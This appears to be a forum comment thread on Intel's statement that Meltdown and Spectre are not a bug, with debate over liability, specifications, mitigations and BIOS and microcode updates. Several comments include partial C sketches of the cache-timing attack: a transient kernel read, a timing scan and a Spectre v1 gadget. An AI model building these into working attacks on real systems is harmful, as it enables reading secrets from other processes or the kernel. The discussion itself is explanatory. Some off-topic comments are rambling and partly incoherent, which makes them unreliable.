Goodness you just described my current work situation that's causing me to rip my hair out. This is a deeply human problem, and I've spent a year trying to mitigate it, but each time the discussion comes up I leave the conference room feeling like certain actors have a personal financial stake in wool fibers.

(No I don't work for Intel)


At work the issue-tracker has open bugs from 2011 detailing how to do SQL injection attacks using some common search interfaces, but noooooo, the sales team just has to update the visual style of the generated contract PDFs... <sigh>


What they are really saying is "It's not just Intel processors. AMD, ARM, and others are just as vulnerable."


Which is half true. All of them are vulnerable to Spectre. So far as I've heard, only Intel (and maybe ARM) are vulnerable to Meltdown, because Meltdown exploits a lack of security checks on speculative execution that, as far as we know, only Intel's implementation has. It's ambiguous whether ARM is vulnerable; I've only heard people saying either "maybe" or that they haven't validated that.

Edit: Elsewhere I found a link to ARM's page where they break down exactly which of their processors are vulnerable to Meltdown and Spectre, and it looks like quite a few are vulnerable to one or both.


I recognize the positive spin; the fact of hardware vulnerability is still little understood, and the trust placed in the cloud ecosystems is almost absolute. If I were Intel I would be planning something like a Microsoft-style security commitment: the sheer resources available to Intel, if concentrated on silicon features capable of e.g. detecting a miscreant hypervisor, look like the next wave of products and marketing. To achieve this spin, however, Intel needs to say much more than they have. They can maintain their current line but score points with sceptics by demonstrating how some attacks work on Intel processors in the wild. Coordinated with industry-wide patches (another point missed here is how Microsoft and others patched branches in November), the wrap-up would be to offer all customers running on vulnerable silicon a migration and a performance bump. This is not a cheap process, but the political climate almost demands resolution at this level.


To me this feels like saying, "My program doesn't have a bug, it's executing the code that I wrote correctly." The actual bug is that the code isn't correct.

In Intel's case, even though the operation is correct, it's the actual design that's flawed.


Yeah... "Hey Mr. CPU-supplier, if I do these things then I can see with 100% certainty the contents of memory areas which I'm not allowed to read!"

"Well, that's an interesting hack, I guess you can! But everything works as designed, so there's no flaw!"


This reads like Patrick Star's "Not My Wallet" meme.


"Works as coded"


I think what Intel is trying to say is that this feature makes the chips insecure by design. It's kind of like in Python, where you can get around the weak protection that putting underscores in front of classes, methods, and variables gives to make them pseudo-private.


Except that these CPUs were not designed to be insecure. CPU makers spent decades marketing their architectures as able to support the implementation of secure operating systems. All of a sudden it is clear that this is not possible without a heavy dose of software stopgaps. It is a fundamental flaw in the CPU architecture that was not disclosed by these companies.


Neither was anyone else aware of this class of security issues with CPUs until recently.


Oh, people were aware; we just neglected the lessons IBM and other time-sharing systems learned in the 70s.


Was there anything like this back then? (Speculative execution, L1 cache, branch prediction all in the same ISA?)


If they were aware, why didn't anyone raise this issue till now?


The people that were aware were probably extracting value out of the fact that not everyone knew.

Could be not worth making a public stink, could be weaponizing the exploit, could be coordinated disclosure.


you mean all these security researchers kept it a secret for the last decade or two?


Until a few days ago, researchers couldn't prove that this was possible because there was no example of such an exploit. But there was the idea that it could be possible. Also, this doesn't mean that people with other interests didn't have their own versions of this exploit and keep it secret.


I'm scarred by the CISC-RISC wars, which were serious for my business at the time. So, in a year when I'm anticipating OpenVMS on x64, and having an indelible memory of the memory-space rings and system calls depending on explicit separation, I remember thinking to myself: well, only four rings in Alpha are critical to VMS, and the Intel Pentium has that many rings... so why didn't they port straight to the main Intel platform? Is this leaking mode the reason?


If you fall 10 floors and die, it's not the architect's fault for not putting a handrail around the balcony. It's your fault for improper use of gravity.

/s


I lived on the seventh floor, so always wondered if that meant I could safely keep a cat?

[Urban legend, afaik, cats can't right themselves with less than the seventh floor height to fall..]


Cats can right themselves in about 12 inches.

The problem is they land with legs extended down from floors 1 to about 7 (bad: impact is transmitted up through shoulders and hips), while higher than about floor 7 they spread their legs out and attempt to parachute (better: impact is uniform over entire ventral surface, terminal velocity is lower, mortality rate drops).

Source: am DVM and interned at AMC in Manhattan.


Very cool, thank you! Also prewitt and Travis above and below..

Mortality rates.. got it ,:-$ So, marketing 7th-floor homes with a kitty life policy in the service charge bill is technically not the blatant fraud I assumed, and if the building manager had run into trouble, the lives of many injured kitties (luckily lookalike to the residents) could make for the hardest sentencing hearing for any animal-lover judge. English cities badly need dog licence reintroduction. I was asked to help a former neighbour, now a tramp, beg the court to return his dog. The second I met the man, who certainly was denied due process and on paper was atrociously mistreated, he introduced the dog, an unknown potentially dominant bulldog mongrel, getting it to lock its jaw on his agitated arm. I passed him again, alone in the rain, the dog's coat sodden; he was high and drunk, careless; no train still disgorges the fool he requires. Dogs need sorting out in London before Brexit chaos.


Actually not an urban legend. Veterinarians in NYC have enough cats fall out of skyscrapers that they have actual data.

http://www.nytimes.com/1989/08/22/science/on-landing-like-a-...


An interesting related video: Slow Motion Flipping Cat Physics [1]

[1]: https://www.youtube.com/watch?v=RtWbpyjJqrU


Can parachutes deploy automatically and safely?

I mean, in cities I keep imagining a much greater extent of elevation, the moment we figure out how. Above the smog line... I'm sure I was in '94, but '16 same place, in the middle, ugh.

Could it become unlawful to rent (or live in, generally) homes without harmful-particle filtration?

I'm thinking of renting out my filters just before tenant viewings, because this eliminates the obvious fresh-air chill, takes out fat or any food smell beyond the kitchen, and even lets a visitor smoke.. (a friend closed a rental deal by offering a cigarette, excused by the filters: it's your residence now). But from flu season to the decoration next door, the cost needs an artificial boost. Wish there was a swapHN channel..


Back in the old days, IBM used to call this "BAD": Broken As Designed.


Not a bug, but a feature.


The Register does a pretty fine job of shredding Intel's doublespeak: "We translated Intel's crap attempt to spin its way out of CPU security bug PR nightmare"

http://www.theregister.co.uk/2018/01/04/intel_meltdown_spect...


"potentially compromising security even though a system is operating exactly as it is designed to"

Sounds like a bug to me. The PR team must have had fun trying to find a way to downplay this one...


Ironically, a chip company, which deals in ones and zeros all day long, committed a very serious logical fallacy: appeal to common practice.

One way to interpret the statement is that the chip design they used is widely available and understood by everyone in the chip community to be good chip design, thus "we aren't at fault, because everyone is doing it."

To reiterate: those types of arguments are a serious logical fallacy and an unsound argument, called appeal to common practice.

They should fire their PR team.


This is not by or for technologists, it is by PR folks for stock-market analysts.

Far from being at risk of being fired, their whole PR department has probably been swelled by the ranks of excruciatingly expensive corporate emergency consultants and experts paid precisely to output this kind of menial drivel.


> To reiterate: those types of arguments are a serious logical fallacy and an unsound argument, called appeal to common practice.

How were they supposed to avoid an exploit that no one would discover for years? And exactly how is "appeal to common practice" a fallacious or unsound argument?

Exactly how much performance -- meaning, how much market share -- is Intel supposed to sacrifice to avoid the possibility of introducing unforeseen bugs?


People did discover it early on as it's inherent in the design of the chips, it just seemed unlikely at the time. Now Intel has to deal with a huge potential liability if something bad happens because of it. It was just bad business.

Also, appealing to common practice doesn't make logical sense.

Here: https://en.wikipedia.org/wiki/Appeal_to_tradition


Also, appealing to common practice doesn't make logical sense.

It is hazardous to apply logical arguments blindly in illogical contexts, such as competitive markets.

Again: mitigating all possible bugs isn't free. Exactly how much effort and expense is worthwhile, and how do you know beforehand?


For competitive markets to remain competitive, actors must receive the right disincentives. Intel reaped decades of competitive advantage by forgoing security for performance. As you said, they decided that the cost of mitigating these known vulnerabilities wasn't worth the benefit. Now it has come to light, and without due punishment, that math will skew even further toward exploitation over safety in the future.


These technologies were created at a time when it seemed very difficult or near impossible to exploit them for the purposes we're seeing today. Of course Intel should have changed course when processor speed and newer technologies were introduced. Rather, they decided not to worry about this.


Or NSA had them do this intentionally, and thus, its not a bug :)


On an "how impractical is this CPU bug as a backdoor"-scale this one is so far off the charts it already left the building.


The example I saw didn't seem that impractical.

A malicious process allocates a 256 member array. Then it creates a conditional where the speculatively executed part writes a byte at offset array + kernel_memory_value. The speculative branch is executed but then backed out, but the byte in the array was touched so it is in cache now. Then the malicious process reads all of the members of the array and looks for one that returns much faster than expected (is in cache) and they know the value of that byte. Rinse and repeat to read the rest of the kernel memory. It's not going to give you MB/s of throughput, but it's plenty fast to read some key material or process tables or anything like that.

It's a very impressive attack. My hat is off to whoever thought it up.
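
In code, the transient piece being described is tiny. A hedged sketch, not a working exploit: it omits the fault suppression / branch training a real attack needs, kernel_addr is a placeholder, and the 4 KiB stride (one page per possible byte value) is there to keep the hardware prefetcher from muddying the signal:

    #include <stddef.h>
    #include <stdint.h>

    #define STRIDE 4096
    static uint8_t probe[256 * STRIDE];       /* the "256 member array", one page apart */

    /* The body below only ever runs transiently: architecturally the kernel read
       faults (Meltdown) or the guarding branch is mispredicted, and the results
       are rolled back -- but probe[secret * STRIDE] is now in the cache. */
    static void transient_leak(const volatile uint8_t *kernel_addr)
    {
        uint8_t secret = *kernel_addr;                 /* not permitted architecturally */
        (void)probe[(size_t)secret * STRIDE];          /* cache footprint survives the rollback */
    }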


I didn't read it as a question of whether the attack is impractical (because it is clearly quite practical) -- the parent was questioning whether it's practical (or not) that such an attack would be "planted" as a backdoor by an agency like the NSA. The attack comes off as quite impractical for something like a plant (sensitive to e.g. compiler output, requiring locally executing code to snoop is already a red flag, and the 'bug' enabling this has really been considered a feature of every mainstream CPU for like 15 years, and not considered by many to be any kind of attack vector.)

Or maybe the idea is speculative execution itself was a dream of the NSA that was Inception-planted into the brains of CPU designers in the 90s; who knows what the theory-of-the-hour is regarding 3-letter-agencies and their capabilities.

Ultimately I think what we're really learning is that guarding against things like microarchitectural attacks on contemporary superscalar, OoO CPUs is going to be an uphill battle that we didn't ever think of due to incidental complexity (among other reasons), and will serve as a new class of attacks. Who knows how long this bug class will exist; we've killed some. What's also likely is that, like most security failures in the industry, this is a result of various things like basic lack of forethought/ill considered design, as opposed to plants (3 letter agencies aren't responsible for the vast majority of security failures you see, it's simple mistakes). But peddling conspiracy theories involving them gets you upvotes, so, you know...


The Meltdown paper cites 500 KB/s average throughput when transactional memory extensions are available on the Intel CPU. It's not MB/s, but it's still pretty fast.


This will give you only memory addresses of the data in question, right?


No it gets you the contents.

The crux is:

array[value_of_kernel_memory_byte] = 1;

So it speculatively indexes into the array by the value stored at that memory address and writes the byte. Then to figure out what the value is you just have to see which element in the array is cached.


To elaborate on this, the write to the array isn't what's being read here.

array[value_of_kernel_memory_byte] = 1;

This assignment gets rolled back like it's supposed to. It's when reading the array after the rollback that the exploit measures that a read to array[value_of_kernel_memory_byte] is faster than the rest because that index is already in the cache.
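
Right. And the recovery step is just a timing scan over that array, something like this (continuing the probe/STRIDE/time_load names from the sketches above; the cache-hit threshold is a per-machine guess):

    /* After the rolled-back speculative access, time a load from each of the
       256 candidate slots; the one that comes back fast is the leaked byte. */
    static int recover_byte(void)
    {
        const uint64_t CACHE_HIT_CYCLES = 80;          /* tune per machine */
        for (int value = 0; value < 256; value++) {
            if (time_load(&probe[value * STRIDE]) < CACHE_HIT_CYCLES)
                return value;
        }
        return -1;                                      /* no clear signal; flush and retry */
    }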


Does that mean we don't need to rush to patch it?


Ignore parent, patch all systems as quickly and orderly as you can.


I replied to a comment saying "Or NSA had them do this intentionally"; my comment is not about whether this is a vulnerability, or whether exploitation is viable (it absolutely is), but rather about whether this is a viable backdoor.


I promise you NSA's machines run on Intel chips too


Yes, but then again, they could also be running with mitigations, like the HAP bit for the ME.


If they designed it like this, and it works as they designed it, is their PR spin opening them up to legal challenge? Presumably they've just been misrepresenting what their system was capable of, if they claim this wasn't news to them.

Is it a valid legal defence to say, that was just marketing lies so don't take it seriously?


> Is it a valid legal defence to say, that was just marketing lies so don't take it seriously?

There actually is a recognized defense to fraud claims along those lines. The concept is called "puffery": https://definitions.uslegal.com/p/puffery/


Well, that's true (at least for the spectre attack). It's not a bug in Intel products. It's a bug in any CPU that uses branch prediction (please correct me if I'm wrong, this is my current understanding)


The effect on Intel is far more severe than on other architectures. There were three vulnerabilities, two grouped together as "spectre" and one called "meltdown." Intel products are uniquely vulnerable to the meltdown attack, while many CPUs are vulnerable to spectre. The summary AFAIUI is that for most CPUs you can attack userspace processes with these techniques (think Javascript running in a browser), while for Intel CPUs you can also attack the kernel. Intel CPUs also seem to be somewhat easier to attack than others because of a higher-bandwidth side channel.


> Intel products are uniquely vulnerable to the meltdown attack

More precisely, there is only a PoC for Intel at this time. AMD processors are believed to not be vulnerable. Some ARM processors _are_ believed to be vulnerable.

> for most CPUs you can attack userspace processes with these techniques

Spectre can attack the kernel as well, at least according to http://www.tomshardware.com/news/meltdown-spectre-exploits-i... . It's just harder to use than meltdown.


That link no longer loads for me.

AIUI, Spectre can be used to attack the kernel only if you can get code running in kernel space, via e.g. eBPF.


No, you could also find a gadget with ROP techniques. The eBPF thing in the paper was purely due to convenience of exploitation.


I think that's almost but not quite exactly right.

Spectre variant 2 attacks vulnerable indirect jump code patterns that exist in the kernel (or some other process), but doesn't require running the attacker's code.

Spectre variant 1 allows you to infer the contents of memory in the same address space, so that's the one where you'd use eBPF to attack the kernel.

Meltdown (variant 3) if I understand correctly can infer memory contents of other address spaces without relying on any assumptions about the code running in the other address space.

https://security.googleblog.com/2018/01/more-details-about-m...


> That link no longer loads for me.

Oh, right, ycombinator's URL parser is broken. I fixed the link to work around the buggy parser....


I'm curious about AMD not being vulnerable, mostly because this page: https://www.kb.cert.org/vuls/id/584653 makes me think that AMD has admitted to being vulnerable.


That page talks about both Meltdown and Spectre, as far as I can tell. AMD is vulnerable to Spectre; everyone agrees on that. According to https://www.amd.com/en/corporate/speculative-execution AMD claims it's not vulnerable to Meltdown (aka "Variant Three").


See this mailing list post https://lkml.org/lkml/2017/12/27/2


A minor correction, ARM's upcoming A75 core looks like it will be vulnerable to Meltdown too. But since it isn't intended for use on server workloads the performance impact of the fix shouldn't be very significant.


I did not realize that Intel CPUs also open up the kernel to the Spectre attack, while others don't. That's noteworthy.


"(at least for the spectre attack)"


That's like if Takata claimed it wasn't a production issue in Takata airbags, it was an issue that affected any airbag that was designed like Takata airbags.

It's a bunch of bullshit trying to dance around the fact that Intel shipped faulty products for years. The fact that other similar products may also be faulty isn't a valid excuse.


I'm not sure that calling it faulty is exactly fair. I feel like the attack is actually pretty brilliant, and has been non-obviously "vulnerable" for years.


The attack is pretty brilliant; but it's also not quite novel. Cache-timing attacks aren't new; certainly CPU suppliers should have known the general issues at hand for... at least a decade? See e.g. Colin Percival's somewhat related attack on hyperthreading way back in 2005: http://www.daemonology.net/papers/htt.pdf

Actually exploiting the information leakage isn't easy, and it's compounded by the secrecy surrounding CPU internals. So I think they definitely deserve some blame here. Yes, the PoC is new. But the attack surface was widely known more than a decade ago, and they chose to punt the issue onto software; a solution that was unlikely to really hold water.


2006: http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.190...

From the abstract:

> Information leakage through covert channels and side channels is becoming a serious problem, especially when these are enhanced by modern processor architecture features. We show how processor architecture features such as simultaneous multithreading, control speculation and shared caches can inadvertently accelerate such covert channels or enable new covert channels and side channels.


Hey, there you go! I kind of doubt Intel really didn't know about this risk.

They were cutting corners; that deserves some opprobrium - especially given their market-dominating position over this timespan.


The same can be said for many security vulnerabilities, but that doesn't make them any less faulty. Shellshock exploited a bug that had been in Bash for 25 years (!), but being non-obvious isn't a free pass.

I am not angry at Intel and in general think they do a good job, but trying to dodge blame here comes off sounding pathetic.


It would be like Takata claiming their airbags are not a problem because all airbags can kill infants. There is a problem that uniquely affects one manufacturer's product line, and another problem that affects many manufacturers. Intel has been shipping chips that are uniquely and more severely affected by these attacks for many years now. They were ignorant, sure, but they did have a uniquely vulnerable design.


That's like if Master Lock claimed it wasn't a production issue in Master locks, it was an issue that affected any lock that was designed like Master locks. It's a bunch of bullshit trying to dance around the fact that Master Lock shipped faulty products for years. The fact that other similar products may also be faulty isn't a valid excuse.


I mean, it's not like a Master Lock is hard to pick or shim. Good comparison ;)


IF the bug is present in all processors that use speculative execution AND Intel products use speculative execution THEN it is a bug in Intel products.

It would only be correct to say "This is not a bug or a flaw exclusive to Intel products"


My interpretation is that they are not calling this a bug or a flaw, but a logical consequence of the design, and that it does not represent a flaw because the original specification didn't require the implementation to be resistant to this kind of attack.


A bug is a bug regardless of what the original specification mentioned.


I don't agree. If a spec leaves out details, the implementors are free to make reasonable decisions on how to implement it. It's more likely the spec didn't really have much to say about promises on the visible effects of speculative execution (the specs are often highly detailed about what side effects can be visible; this is a consequence of modern complex processors, which have very subtle designs).

A bug would occur in the case where the specification specified that there were no visible side effects from these mispredicted speculative executions, and the processor implementor failed to implement that part of the specification. This is a big deal because if it's a bug, Intel is liable.

It's likely that for all processors with these kinds of features, the specs will get updated to be more specific about these kinds of side effects.


I think the specification has a problem if a conformant implementation has a problem, particularly if it's a security one. There should be as little as possible left free to the implementors.

The KRACK attack from a couple of months ago was due to the fact that the WPA2 specification was ambiguous about what values to accept. Most implementations allowed decrypting traffic, and a few even allowed hosts to impersonate other hosts, yet they were perfectly conformant. I would say there is a flaw in the WPA2 specification.

There are always going to be unintended consequences but this one about effects of branch prediction seems, ironically, quite predictable.


Every design is a tradeoff, and spec authors don't want implementors to have their hands tied fixing every last problem.


Are you saying a bug cannot exist unless some functionality is specifically mentioned in the specification, and broken in reality?


From the perspective of Intel, as well as most of the microprocessor industry, yeah. Even "broken in reality" is arguable: while this is indeed an exploit, choosing performance over security (when the resources to implement a chip are finite) is a legitimate design tradeoff.


Are you saying a bug cannot exist unless some functionality is specifically mentioned in the specification, and broken in reality?

That's a philosophical stance known as "positivism."


> If a spec leaves out details

Who do you think wrote the spec here?


system architects at intel, obviously.


Ok, so you're saying Intel wrote a poor spec and implemented to that spec, so it's no fault of theirs because “we implemented to the spec”?


I didn't say it was no fault of theirs. But it does really matter to Intel and their (large-scale) customers in terms of liability.


So Intel is still liable then.


Right, so the mismatch here is whether or not the CPU is being pitched as wholly secure. If it is "mostly secure with insecure performance enhancements" or really "mostly secure with performance enhancements that have an unspecified level of security", then... It's "not a bug".

It's a huge lapse in customer trust, for sure. But if you're just going to play that semantics game...

I think the good point here is whether or not Intel engineers knew of patterns like this (they should have), and whether it is negligent or unethical to release products that have these vulnerabilities built in. Insecure (or "undefined") by intention or by coercion.


So it's a bug in the specification.


so it is a flaw in the spec then.


It feels like you should be able to make a version of branch prediction with speculative execution that behaves the same as the non-speculative, for-real execution. As in: accessing memory you aren't actually allowed to access doesn't cause a load and doesn't speculatively execute further instructions with data you weren't supposed to be able to load in the first place.

This is after all what the real execution does: when you try to load from a memory address that you are not allowed to, it does not cause a memory load, it does not affect the cache, and it does not continue executing instructions but instead generates a page fault. We skip the page fault thing in speculative execution, obviously, but we shouldn't continue normal control flow.

I'm sure that is a lot more difficult to implement in silicon and may end up negating the performance benefits of speculative execution, but right now it feels like not having the memory protection in place in speculative execution is a performance hack that exploded in all our faces.


In spectre, the victim process is coerced (via branch misprediction, in their first example) to speculatively access its own memory, resulting in side-effects that you can measure to determine the memory contents. No violation of memory protection needed.
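For reference, the bounds-check gadget from the Spectre paper (variant 1) has roughly this shape in C; the names and the page-sized stride here are illustrative, and the branch predictor is first trained with in-bounds values of x:

    #include <stddef.h>
    #include <stdint.h>

    size_t  array1_size = 16;
    uint8_t array1[16];
    uint8_t array2[256 * 4096];  /* probe array, one page per byte value */
    volatile uint8_t y;

    /* An ordinary bounds check in the victim.  Once the predictor has been
     * trained to expect the branch to be taken, an out-of-bounds x is
     * speculatively accepted: array1[x] reads memory it shouldn't, and the
     * dependent array2 access encodes that byte into the cache, where a
     * timing probe can recover it after the misprediction is rolled back. */
    void victim(size_t x) {
        if (x < array1_size)
            y = array2[array1[x] * 4096];
    }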


But it is a bug in Intel products. Whether similarly designed products are also affected is orthogonal.


Any CPU that uses branch prediction and doesn't invalidate the cache after a mispredicted branch, I think.


How is that supposed to work? You would have to flush the entire cache on every branch, which would mostly defeat the point of the cache in the first place.

(The exploit involves reading an off-limits location in the speculative branch, then reading a legal location based on the off-limits value; so unless the entire cache was flushed the attack would still be possible.)


Could you somehow mark cache lines that are filled by speculatively executed instructions so they only become visible to normally executed instructions when the speculative instructions are committed? I guess that would require a lot more logic and more cache tag bits.


You can then detect which addresses were loaded because they caused other cache lines to be evicted.

Even if speculative loads do not modify the cache, you could still have a side channel by analyzing the memory bus contention.

IMO there is no way to get rid of these timing attacks entirely without getting rid of SMT and speculation.


The solution may lie in a new "non-speculative load" instruction that delays execution until preceding branches are confirmed.

This would allow keeping the performance of speculative execution in the vast majority of cases, while also fixing the kind of potentially leaking double-indirections that Spectre variant 1 can exploit.

Spectre variant 2 needs to be fixed by isolation of the branch prediction structures, i.e. tagging the BTB and others with the PCID and privilege level.
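Something close to a non-speculative load already exists as a retrofit: on x86, lfence is documented and used as a speculation barrier for exactly this kind of bounds-check-bypass case. A hedged sketch, reusing the illustrative variant-1 names from the gadget example above:

    #include <stddef.h>
    #include <stdint.h>
    #include <x86intrin.h>      /* _mm_lfence */

    extern size_t   array1_size;
    extern uint8_t  array1[], array2[];
    extern volatile uint8_t y;

    /* Variant-1 gadget with a speculation barrier: loads after the lfence
     * are not dispatched until the bounds check has actually resolved, so
     * a mispredicted branch can no longer leak array1[x] via the cache. */
    void victim_hardened(size_t x) {
        if (x < array1_size) {
            _mm_lfence();
            y = array2[array1[x] * 4096];
        }
    }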


> The solution may lie in a new "non-speculative load" instruction that delays execution until preceding branches are confirmed.

That's sadly not enough.

There are also potential speculation-based side-channels that are unrelated to cache: timing the idiv operation whose latency "depends on number of significant bits in absolute value of dividend." Furthermore there are many ways to measure contention on the execution ports which can leak information about the speculative execution.


Well, there seems to be a lot of hysteria right now. You mention speculation-based side effects in general, but keep in mind that only data-dependent side effects matter. There aren't that many of those outside the memory system, if any.

You mention idiv, which is an interesting example. Is it actually observable? Without hyper-threading, almost certainly not, because the execution unit reservations should be dropped as soon as the speculated branch is resolved. With hyper-threading? Perhaps, but it shouldn't be too hard to fix if a non-speculated thread always takes precedence over a speculated one, which makes sense anyway.

In both cases there may be leaks in practice, but those should be fixable relatively easily in hardware, and we've already established that hardware fixes are required anyway.

Another case to think about are dependent conditional branches, since those could affect the instruction cache.

It does seem like a good idea to have a strict barrier instruction against speculative execution just to have a fallback mitigation.


It wouldn't just require more cache tag bits, you would have to hold the old data somewhere and be able to read that with zero extra delay.

Because eviction is a side-channel too.


They are saying this to protect future products that are too late to update. A flaw must be fixed. This thing will exist in near-future chips for years until they redesign. So long as they can call it a software issue, they need not stop production.


Does this mean it was deliberately designed to be insecure to gain some performance?

With each day passing this looks more and more like the Diesel scandal. Is it OK if all big players do it?


" even though a system is operating exactly as it is designed to."

So people can leverage the poopy design of your chip to steal compromising information? And it's okay because the chip is functioning as it should?

It shows how deeply embedded the idea of maintaining "proper design and processes" is, as opposed to going back to the drawing board and designing a secure chip.


So people can leverage the shitty design of your lock to steal goods? And it's okay because the lock is functioning as it should? It shows how deeply embedded the idea of maintaining "proper design and processes" is, as opposed to going back to the drawing board and designing a secure lock.


It's an interesting debate. But it's clear in the statement they provided that they are laser-focused on design above all else.

Literally, prioritize proper design over security and maybe even performance in some cases. Which is interesting, because you'd figure that at some point the customer would be considered in the design.

Like are Intel chips designed by robots or something?


So people can leverage the shitty design of your lock to steal goods? And it's okay because the lock is functioning as it should?

That's how Master Lock stays in business.


Movie theatre is a good one.

Our service works just as expected, without any flaws. Our ushers check for proper tickets after the presentation has finished; that way we know who should and should not have access to the theatre.

But shouldn't you check beforehand?

Again our service works ...


I read this as saying "our lawyers do not want us to preemptively strengthen the case for legal liability for damages", and as being completely independent of plans for mitigation or future product changes.


And now people have found (made?) two workarounds for those hardware design specifications: Spectre and Meltdown.

So people made workarounds for those two workarounds: software patches.

Maybe even more other people will find (or make?) workarounds for those software patches?

Will we witness a semi-endless cycle of workarounds until the current design specifications slowly become worthless?

Or will we suddenly witness new updated (patched?) design specifications (with some extra free features we never knew we wanted) and all buy new hardware?


> This is not a bug or a flaw in Intel products. . .[the] system is operating exactly as it is designed to.

So Intel has learned nothing and will be prone to similar mistakes in the future.


Fingers crossed for new CEO?


This ridiculous double-speak is just their lawyers attempting to minimize exposure to claims for replacement processors due to not performing to specifications.


I find it very interesting that most of their official communication on this matter seems to be for their shareholders rather than the people who are directly impacted by using their products, as if they already completely gave up on the latter. Or maybe they think we wouldn't see through this bullshit PR speak, in which case I feel quite insulted.


So what they're saying is that it was designed with a fault from the beginning. Or maybe we are just using it wrong?


I would imagine trying to preempt class actions.


I read this in HAL's voice


Actually, it’s a feature.


Dear Intel, don't worry, this will be court tested.

And btw, did you notice that a huge number of people already disagree with you, putting your stock down 8% in two days?


The majority of the people putting the stock value down have no clue how bad this is: they are just making a bet (and many of them will make a lot of money even if this turns out to be an elaborate hoax). Sure, a lot of people disagree, but if you read all the threads here you can quickly get a sense that even people who have a clue what this means on a technical level (those who read Hacker News) don't agree on how bad it is.


What if the court is in the same pocket as Intel?


Lenovo has BIOS updates that specifically mention CVE-2017-5715 (Spectre). I wonder if this is an Intel microcode update.

https://pcsupport.lenovo.com/de/en/products/laptops-and-netb...


For those who, like me, are running Linux and asking how to update the BIOS, Lenovo provides an ISO file. Quoting from [1]:

"The BIOS Update CD can boot the computer disregarding the operating systems and update the UEFI BIOS (including system program and Embedded Controller program) stored in the ThinkPad computer to fix problems, add new functions, or expand functions as noted below."

[1]: https://support.lenovo.com/fr/en/downloads/ds120430


Yeah, basically all BIOSes have that. Some simply need a FAT-formatted USB key inserted with a specifically named file that the BIOS looks for, instead of a "true" bootable medium.


I wonder what this means (if anything) for machines running Coreboot.


And how do I get these firmware updates and microcode updates on Windows?

Checking ASRock, there aren't any BIOS updates.

Also:

> Customers who only install the Windows January 2018 security updates will not receive the benefit of all known protections against the vulnerabilities. In addition to installing the January security updates, a processor microcode, or firmware, update is required. This should be available through your device manufacturer. Surface customers will receive a microcode update via Windows update.

From:

https://support.microsoft.com/en-gb/help/4073119/windows-cli...

(There is also a PowerShell script to check whether you are fully protected or not.)


"This should be available through your device manufacturer."

I'm not holding my breath.


Microcode updates are distributed via Windows update.


But Microsoft says they are not:

>In addition to installing the January security updates, a processor microcode, or firmware, update is required. This should be available through your device manufacturer. Surface customers will receive a microcode update via Windows update.

https://support.microsoft.com/en-gb/help/4073119/windows-cli...


If the microcode update requires motherboard vendors to issue BIOS updates we are all doomed.


This appears to be the case at least on my Windows 10 laptop.

I've installed the hotfix for Windows, but when I run the PowerShell script to determine whether mitigation is active, the script tells me that it's not active, due to lack of hardware support. The script then goes on to give the recommendation to "Install BIOS/firmware update provided by your device OEM that enables hardware support for the branch target injection mitigation."

It's a 1-year-old ASUS laptop and I would be surprised if they even give a sane response to my question to their technical support (I doubt they will even know what I'm talking about).


"Dear OEM Vendor Technical Support,

There has been recent news about critical security issues in Intel CPUs, requiring a firmware update for all laptops and motherboards with Intel chips.

The vulnerabilities include the potential for malicious websites to read sensitive system memory, including passwords and encryption keys.

I have model XXYY-ZZZZ, do you have any information on when an update will be available, and where I can access it?

If not, can you attempt to escalate this ticket? The security issues are starting to make the rounds in the news, and more information can be found at https://meltdownattack.com

Thank you, and happy new year :)"

Seems like it might be worth a shot.


"Dear usr frend,

thx for ur interst in our product. our team will reach u. we have many new products. hope u have great new year!

- OEM volume sales"


Thanks! I will use this if they don't understand my version of it.


I saw the same thing on my Lenovo laptop: installed the Windows update, the PowerShell scripts said it's missing HW support. Installed a new BIOS update from Lenovo (released two weeks ago, btw), now the PS script says I have the needed HW support and is now protected. So on this laptop, the needed microcode appears to have come from a new BIOS and not via Windows.

I have another Gigabyte MB that I suspect is too old for BIOS updates anymore, so I am really hoping that at some point these microcode updates do come through Windows and not just via BIOS updates.


Same here with 1-year old HP laptop.


Somehow I doubt Sony's going to be updating the BIOS for this VAIO laptop I'm typing this on, given that the last update was in 2012... and they don't even make computers anymore.


There are a variety of examples of Microcode updates referenced on support.microsoft.com (here's just one):

https://support.microsoft.com/en-us/help/3064209/june-2015-i...

...so I suspect this is just a standard disclaimer.

Generally, microcode updates are distributed with the OS or OS distribution.


Microcode updates come as normal Windows updates.
